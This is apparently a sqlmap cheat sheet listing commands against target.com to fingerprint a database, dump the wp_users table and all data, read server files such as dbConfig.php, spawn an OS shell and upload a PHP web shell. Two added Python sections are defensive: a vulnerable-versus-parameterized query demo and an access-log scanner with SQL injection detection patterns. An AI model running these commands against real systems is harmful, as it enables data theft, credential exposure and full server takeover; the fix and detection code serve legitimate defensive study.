sqlmap is an amazing and super useful penetration testing tool that automates the process of detecting and exploiting SQL injection. The sections below list the commands used most often, each with its syntax and an example.
Get DBMS banner
Syntax:
sqlmap <url> -p <parameter vulnerable> -b
Example:
sqlmap http://target.com/vulnerable.php?id=123 -p id -b
Get current database name
Syntax:
sqlmap <url> -p <parameter vulnerable> --current-db
Example:
sqlmap http://target.com/vulnerable.php?id=123 -p id --current-db
Get current username
Syntax:
sqlmap <url> -p <parameter vulnerable> --current-user
Example:
sqlmap http://target.com/vulnerable.php?id=123 -p id --current-user
Get the list of tables in a database
Syntax:
sqlmap <url> -p <parameter vulnerable> -D <database_name> --tables
Example:
sqlmap http://target.com/vulnerable.php?id=123 -p id -D wordpress_db --tables
Get the list of columns in a table
Syntax:
sqlmap <url> -p <parameter_vulnerable> -D <database_name> -T <table_name> --columns
Example:
sqlmap http://target.com/vulnerable.php?id=123 -p id -D wordpress_db -T wp_users --columns
Dump table information
Syntax:
sqlmap <url> -p <parameter_vulnerable> -D <database_name> -T <table_name> --dump
Example:
sqlmap http://target.com/vulnerable.php?id=123 -p id -D wordpress_db -T wp_users --dump
Dump ALL database information
Syntax:
sqlmap <url> -p <parameter_vulnerable> -D <database_name> --dump-all
Example:
sqlmap http://target.com/vulnerable.php?id=123 -p id -D wordpress_db --dump-all
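The enumeration and dump commands above only work because vulnerable.php builds its query by pasting the id value straight into SQL text. The following is an added example, not code from this page, that shows that pattern next to its fix. It uses Python's built-in sqlite3 module with a constructed in-memory wp_users table (the table name is borrowed from the examples above; the rows are made up), so it runs offline:

```python
import sqlite3


def make_db():
    """Constructed sample data standing in for the application's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_users (id INTEGER PRIMARY KEY, user_login TEXT)")
    conn.executemany(
        "INSERT INTO wp_users VALUES (?, ?)",
        [(123, "alice"), (124, "bob"), (125, "carol")],
    )
    return conn


def lookup_vulnerable(conn, user_id):
    """The bug sqlmap exploits: the request parameter becomes part of the SQL text,
    so a value such as '123 OR 1=1' changes the query's logic."""
    sql = f"SELECT id, user_login FROM wp_users WHERE id = {user_id}"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    """The fix: validate the type, then bind the value as a parameter.
    A bound value is data to the database engine, never SQL syntax."""
    try:
        uid = int(user_id)
    except ValueError:
        return []  # non-numeric id: reject instead of querying
    return conn.execute(
        "SELECT id, user_login FROM wp_users WHERE id = ?", (uid,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "123"))          # one row
    print(lookup_vulnerable(db, "123 OR 1=1"))   # every row: the injection worked
    print(lookup_safe(db, "123 OR 1=1"))         # []: the same input is harmless
```

The int() check is defence in depth; the parameter binding alone already stops the injection, because the driver never lets the value be parsed as SQL.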
Spawn a Shell
For this you need to know a writable directory on the server, for example /var/www/html/uploads/
Syntax:
sqlmap <url> -p <parameter_vulnerable> -D <database_name> --os-shell
Example:
sqlmap http://target.com/vulnerable.php?id=123 -p id -D wordpress_db --os-shell
Uploading a shell
For this you need to know a writable directory on the server, for example /var/www/html/uploads/
Syntax:
sqlmap <url> --file-dest="<remoteDirectory>" --file-write="<yourLocalFile.php>"
Example:
sqlmap http://target.com/vulnerable.php?id=123 -p id --file-dest="/var/www/uploads/shell.php" --file-write="/tmp/myshell.php"
Executing a Query
Syntax:
sqlmap <url> -p <parameter_vulnerable> -D <databaseName> --sql-query <sql_sentence>
Example:
sqlmap http://target.com/vulnerable.php?id=123 -p id -D wordpress_db --sql-query "Select * from wp_users;"
Downloading files from the server
Note: for this you need to know the file layout on the server.
Syntax:
sqlmap <url> -p <parameter_vulnerable> -D <databaseName> --file-read=<PathFile>
Example:
sqlmap http://target.com/vulnerable.php?id=123 -p id -D wordpress_db --file-read=/var/www/html/dbConfig.php
Specify the injection point inside the URL
Syntax:
An asterisk (*) placed in the URL marks the injection point; use it when the vulnerable value is not a named query-string parameter:
sqlmap --url https://target.com/articles/*vulnerable-param
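From the defender's side, every command on this page produces a burst of requests against the same parameter, and by default sqlmap identifies itself with a User-Agent that begins with sqlmap/ (the --user-agent and --random-agent options change that, so the header alone is not enough). The added example below is not part of this page: it parses a few constructed combined-format access log lines (Apache/nginx style) and flags requests that carry the default User-Agent or whose decoded query string contains typical injection fragments (UNION SELECT, SLEEP(, AND 1=1, INTO OUTFILE/DUMPFILE, the last being how a file write lands on disk on MySQL). The IP addresses, timestamps and version string in the sample lines are made up.

```python
import re
from urllib.parse import unquote_plus

# Combined log format: ip ident user [time] "method path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)

# Fragments that show up in boolean-, union-, time-based and file-write probes.
SQLI_RE = re.compile(
    r"(union\s+(all\s+)?select"
    r"|\bsleep\s*\("
    r"|\bbenchmark\s*\("
    r"|\b(and|or)\s+\d+\s*=\s*\d+"
    r"|information_schema"
    r"|load_file\s*\("
    r"|into\s+(out|dump)file)",
    re.IGNORECASE,
)

# Constructed sample lines (not real traffic): one normal request, two probes.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /vulnerable.php?id=123 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /vulnerable.php?id=123%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"',
    '203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "GET /vulnerable.php?id=123%20UNION%20ALL%20SELECT%20NULL%2CNULL-- HTTP/1.1" 200 640 "-" "Mozilla/5.0 (custom)"',
]


def scan_access_log(lines):
    """Return one finding per suspicious request: source ip, decoded path, reasons."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        ua = m.group("ua")
        path = unquote_plus(m.group("path"))  # decode %20, %3D, + so patterns match
        reasons = []
        if ua.lower().startswith("sqlmap/"):
            reasons.append("sqlmap user-agent")
        if SQLI_RE.search(path):
            reasons.append("sql injection pattern in request")
        if reasons:
            findings.append({"ip": m.group("ip"), "path": path, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f["ip"], f["reasons"], f["path"])
```

Because the third sample line spoofs a browser User-Agent, only the payload pattern catches it; in practice pair this with a per-source request-rate check, since a scan against one parameter produces hundreds of requests in a short window.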
Docker Version
1.- Pull the image from Docker Hub
docker pull paoloo/sqlmap
2.- Create a directory for the volume (results will be saved in this directory)
mkdir /tmp/sqlmap
3.- Run the image in a temporary container (removed when it exits); the mounted directory receives sqlmap's output
docker run --rm -it -v /tmp/sqlmap:/root/.sqlmap/ paoloo/sqlmap --url https://target.com/articles.php?id=1 -p id